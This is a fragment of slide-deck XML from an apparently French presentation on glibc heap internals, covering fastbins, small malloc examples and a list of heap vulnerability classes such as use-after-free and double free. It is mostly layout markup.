          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287889" y="431081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0x10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757A8126-5402-48FA-87C5-BF84C04CAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="430182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0x10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9B385239-2508-40F5-8213-6650AC5F5309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6578718" y="580526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0x20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172F0FDB-2B23-4B26-8C92-922F6E3FDB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="1600200"/>
            <a:ext cx="9413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Liste chainée qui contient une liste de  « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » libre (bin)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Pour les « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » de 16 à 80 bytes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Dernier bloc free, premier bloc utilisé</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B2543F5-B769-4A3E-BDAD-C7AD928AE2A0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9" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914B8D99-9E7E-4233-A3FD-16F7F709653B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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7022F4-6180-42DA-B878-A17D5EF58F09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2" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6CAF3A-5456-4055-A473-73286F9C5A06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3" name="Flèche : chevron 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208F09D7-7295-4C37-82C4-DCA4032FB18C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35" name="Flèche : chevron 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE90AD84-A361-42C4-876E-FDE90B41CCAC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1658007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DAB388-7168-4960-A07C-8A09E3EB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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>example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16368B-C8F3-44F4-8149-E4566A1AE1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3429000"/>
            <a:ext cx="18002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D38B6B-071C-4CEE-9565-6C0092F2FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3861048"/>
            <a:ext cx="18002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7CFC661-8052-42E4-8A47-FBBDBD696B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3429000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 : 0x10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8F60422-C287-465F-BDF5-A2B725F13870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3892406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: 0x20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3574293-AC5A-4BFD-933A-7C2BF7C97375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606861" y="4393704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B859D2-B103-4B96-A9C5-E4102114B1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947752" y="4795672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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur : en angle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DC3638-B824-423E-937D-F3F3583A8D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="4077072"/>
            <a:ext cx="1172031" cy="1151388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82DFA23-7A73-4846-B702-C48CE1B450A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957798" y="3324744"/>
            <a:ext cx="1790153" cy="8655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830778D-409A-40E8-A150-D96109C874C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="3331860"/>
            <a:ext cx="1356442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C2031D-65AF-4AB0-B61E-6DC8BC81EF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343796" y="4795672"/>
            <a:ext cx="3876572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6147BB0-D154-430B-A67C-B611DD634689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4556731" y="3325207"/>
            <a:ext cx="396044" cy="8655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F263045-42F6-400A-8048-3EDF149A29E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="3331860"/>
            <a:ext cx="396044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1DB1DD5-2408-47C8-9876-B20003BB345A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4795672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FCAAA752-5940-4930-B765-F5E03B4E11DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4303567"/>
            <a:ext cx="2196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F83A72AC-7AB9-4A4C-B2FF-634971CF0285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="4298658"/>
            <a:ext cx="2196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336D1C29-B644-4D71-8719-7DEF234F5CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="5805264"/>
            <a:ext cx="46686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1E112C08-0C2B-4DCC-A05D-57628E975477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287889" y="431081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0x10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757A8126-5402-48FA-87C5-BF84C04CAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="430182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0x10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9B385239-2508-40F5-8213-6650AC5F5309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6578718" y="580526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0x20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172F0FDB-2B23-4B26-8C92-922F6E3FDB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="1600200"/>
            <a:ext cx="9413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char* A = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Connecteur : en angle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D7ECDA8-33F8-4F7A-A5D6-C21208A4F55F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3379677" y="3331860"/>
            <a:ext cx="5294842" cy="313164"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11214"/>
              <a:gd name="adj2" fmla="val 172997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71E7E44-DE47-4973-8686-DBB46EB179C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872541" y="3331860"/>
            <a:ext cx="424371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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3080B954-711C-46E4-9F1E-E4E585C0C6D7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8" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC053B4-82F4-4D4B-85CB-FA3F2647BE99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29" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79AC5B2D-B49F-45C2-B2CA-3351CAFED1E4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1" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB0D8B3E-2ABB-454E-BA1C-310758D23871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2" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED6AE89E-234E-4EA0-9107-0AD354BD0785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33" name="Flèche : chevron 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6749E6BB-7A9D-4838-8BB6-5BF979975033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1332217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DAB388-7168-4960-A07C-8A09E3EB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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>example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16368B-C8F3-44F4-8149-E4566A1AE1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3429000"/>
            <a:ext cx="18002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D38B6B-071C-4CEE-9565-6C0092F2FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3861048"/>
            <a:ext cx="18002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7CFC661-8052-42E4-8A47-FBBDBD696B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3429000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 : 0x10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8F60422-C287-465F-BDF5-A2B725F13870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3892406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: 0x20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3574293-AC5A-4BFD-933A-7C2BF7C97375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606861" y="4393704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B859D2-B103-4B96-A9C5-E4102114B1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947752" y="4795672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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur : en angle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DC3638-B824-423E-937D-F3F3583A8D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="4077072"/>
            <a:ext cx="1172031" cy="1151388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82DFA23-7A73-4846-B702-C48CE1B450A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957798" y="3324744"/>
            <a:ext cx="1790153" cy="8655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830778D-409A-40E8-A150-D96109C874C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872541" y="3331860"/>
            <a:ext cx="1780813" cy="8655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C2031D-65AF-4AB0-B61E-6DC8BC81EF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343796" y="4795672"/>
            <a:ext cx="3876572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6147BB0-D154-430B-A67C-B611DD634689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4561754" y="3324744"/>
            <a:ext cx="396044" cy="8655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F263045-42F6-400A-8048-3EDF149A29E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="3331860"/>
            <a:ext cx="396044" cy="8655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1DB1DD5-2408-47C8-9876-B20003BB345A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4795672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FCAAA752-5940-4930-B765-F5E03B4E11DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4303567"/>
            <a:ext cx="2196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F83A72AC-7AB9-4A4C-B2FF-634971CF0285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="4298658"/>
            <a:ext cx="2196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336D1C29-B644-4D71-8719-7DEF234F5CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="5805264"/>
            <a:ext cx="46686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1E112C08-0C2B-4DCC-A05D-57628E975477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287889" y="431081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0x10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757A8126-5402-48FA-87C5-BF84C04CAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296912" y="430182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0x10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9B385239-2508-40F5-8213-6650AC5F5309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6578718" y="580526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0x20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172F0FDB-2B23-4B26-8C92-922F6E3FDB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="1600200"/>
            <a:ext cx="9413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char* A = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)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char* B = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906CEF41-E72F-4181-BB08-223D9F536049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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3675991-B61C-43A5-8ADF-4A5B341575E1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27" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A798D799-F030-4504-A4AF-ED21208110E6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8" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09F4E46E-B859-46F3-93B9-A78D9DDF7970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9" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC9EE28-BC4F-49BC-9914-2A8FBFD9D4F1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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FA4CB2-5443-4464-AC79-39B748524A2A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4253198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Concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Unitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Double free corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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3148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DAB388-7168-4960-A07C-8A09E3EB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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>example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16368B-C8F3-44F4-8149-E4566A1AE1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3429000"/>
            <a:ext cx="18002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D38B6B-071C-4CEE-9565-6C0092F2FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3861048"/>
            <a:ext cx="18002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7CFC661-8052-42E4-8A47-FBBDBD696B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3429000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 : 0x10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8F60422-C287-465F-BDF5-A2B725F13870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3892406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: 0x20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3574293-AC5A-4BFD-933A-7C2BF7C97375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606861" y="4393704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9B170D-A569-4CDE-A946-C9FB473AD091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946027" y="3324744"/>
            <a:ext cx="396044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B859D2-B103-4B96-A9C5-E4102114B1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947752" y="4795672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80CEE0D5-897A-48F0-A4FE-18C84FEB79A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="3645024"/>
            <a:ext cx="1170306" cy="112508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 : en angle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DC3638-B824-423E-937D-F3F3583A8D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="4077072"/>
            <a:ext cx="1172031" cy="1151388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82DFA23-7A73-4846-B702-C48CE1B450A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5347950" y="3324744"/>
            <a:ext cx="1400001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830778D-409A-40E8-A150-D96109C874C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872541" y="3331860"/>
            <a:ext cx="1780813" cy="8655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C2031D-65AF-4AB0-B61E-6DC8BC81EF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343796" y="4795672"/>
            <a:ext cx="3876572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6147BB0-D154-430B-A67C-B611DD634689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4549983" y="3324744"/>
            <a:ext cx="396044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F263045-42F6-400A-8048-3EDF149A29E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="3331860"/>
            <a:ext cx="396044" cy="8655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1DB1DD5-2408-47C8-9876-B20003BB345A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4795672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FCAAA752-5940-4930-B765-F5E03B4E11DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4303567"/>
            <a:ext cx="2196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F83A72AC-7AB9-4A4C-B2FF-634971CF0285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="4298658"/>
            <a:ext cx="2196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336D1C29-B644-4D71-8719-7DEF234F5CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
